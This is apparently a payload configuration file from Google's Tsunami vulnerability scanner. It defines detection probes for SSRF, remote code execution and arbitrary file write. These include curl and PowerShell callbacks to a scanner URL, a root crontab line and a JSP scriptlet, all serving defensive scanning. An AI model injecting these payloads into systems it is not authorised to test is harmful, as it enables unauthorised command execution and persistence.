# Copyright 2022 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

# See payload_generator.proto for how this file is defined

payloads:
  - name: general_ssrf_callback
    interpretation_environment: INTERPRETATION_ANY
    execution_environment: EXEC_ANY
    uses_callback_server: true
    payload_string: $TSUNAMI_PAYLOAD_TOKEN_URL
    vulnerability_type:
      - SSRF
  - name: general_ssrf_no_callback
    # Detectors could break if this page changes or goes down.
    interpretation_environment: INTERPRETATION_ANY
    execution_environment: EXEC_ANY
    uses_callback_server: false
    payload_string: http://public-firing-range.appspot.com/
    validation_type: VALIDATION_REGEX
    validation_regex: (?s).*What is the Firing Range?.*
    vulnerability_type:
      - SSRF
  - name: linux_callback
    interpretation_environment: LINUX_SHELL
    execution_environment: EXEC_INTERPRETATION_ENVIRONMENT
    uses_callback_server: true
    payload_string: curl $TSUNAMI_PAYLOAD_TOKEN_URL
    vulnerability_type:
      - REFLECTIVE_RCE
      - BLIND_RCE
  - name: linux_root_crontab
    # Write the crontab payload to /etc/cron.d/tsunami_rce_cron
    interpretation_environment: LINUX_ROOT_CRONTAB
    execution_environment: EXEC_INTERPRETATION_ENVIRONMENT
    uses_callback_server: true
    payload_string: "* * * * * root curl $TSUNAMI_PAYLOAD_TOKEN_URL \n"
    vulnerability_type:
      - ARBITRARY_FILE_WRITE
  - name: linux_curl_trace_read
    interpretation_environment: LINUX_SHELL
    execution_environment: EXEC_INTERPRETATION_ENVIRONMENT
    uses_callback_server: false
    payload_string: curl --trace /tmp/tsunami-rce -- tsunami-rce-$TSUNAMI_PAYLOAD_TOKEN_RANDOM
    validation_type: VALIDATION_REGEX
    validation_regex: (?s).*tsunami-rce-$TSUNAMI_PAYLOAD_TOKEN_RANDOM.*
    vulnerability_type:
      - BLIND_RCE_FILE_READ
  - name: windows_callback
    interpretation_environment: WINDOWS_SHELL
    execution_environment: EXEC_INTERPRETATION_ENVIRONMENT
    uses_callback_server: true
    payload_string: powershell -Command "Invoke-WebRequest -URI $TSUNAMI_PAYLOAD_TOKEN_URL"
    vulnerability_type:
      - REFLECTIVE_RCE
      - BLIND_RCE
  - name: windows_echo
    interpretation_environment: WINDOWS_SHELL
    execution_environment: EXEC_INTERPRETATION_ENVIRONMENT
    uses_callback_server: false
    payload_string: powershell -Command "echo TSUNAMI_PAYLOAD_START$(echo $TSUNAMI_PAYLOAD_TOKEN_RANDOM)TSUNAMI_PAYLOAD_END"
    validation_type: VALIDATION_REGEX
    validation_regex: (?s).*TSUNAMI_PAYLOAD_START$TSUNAMI_PAYLOAD_TOKEN_RANDOMTSUNAMI_PAYLOAD_END.*
    vulnerability_type:
      - REFLECTIVE_RCE
  - name: linux_printf
    interpretation_environment: LINUX_SHELL
    execution_environment: EXEC_INTERPRETATION_ENVIRONMENT
    uses_callback_server: false
    payload_string: printf %s%s%s TSUNAMI_PAYLOAD_START $TSUNAMI_PAYLOAD_TOKEN_RANDOM TSUNAMI_PAYLOAD_END
    validation_type: VALIDATION_REGEX
    validation_regex: (?s).*TSUNAMI_PAYLOAD_START$TSUNAMI_PAYLOAD_TOKEN_RANDOMTSUNAMI_PAYLOAD_END.*
    vulnerability_type:
      - REFLECTIVE_RCE
  - name: java_string_format
    interpretationEnvironment: JAVA
    executionEnvironment: EXEC_INTERPRETATION_ENVIRONMENT
    usesCallbackServer: false
    payloadString: String.format("%s%s%s", "TSUNAMI_PAYLOAD_START", "$TSUNAMI_PAYLOAD_TOKEN_RANDOM", "TSUNAMI_PAYLOAD_END")
    validation_type: VALIDATION_REGEX
    validation_regex: (?s).*TSUNAMI_PAYLOAD_START$TSUNAMI_PAYLOAD_TOKEN_RANDOMTSUNAMI_PAYLOAD_END.*
    vulnerabilityType:
      - REFLECTIVE_RCE
  - name: jsp_print
    interpretation_environment: JSP
    execution_environment: EXEC_INTERPRETATION_ENVIRONMENT
    uses_callback_server: false
    payload_string: <% out.print(String.format("%s%s%s","TSUNAMI_PAYLOAD_START", "$TSUNAMI_PAYLOAD_TOKEN_RANDOM", "TSUNAMI_PAYLOAD_END")); %>
    validation_type: VALIDATION_REGEX
    validation_regex: (?s).*TSUNAMI_PAYLOAD_START$TSUNAMI_PAYLOAD_TOKEN_RANDOMTSUNAMI_PAYLOAD_END.*
    vulnerability_type:
      - REFLECTIVE_RCE
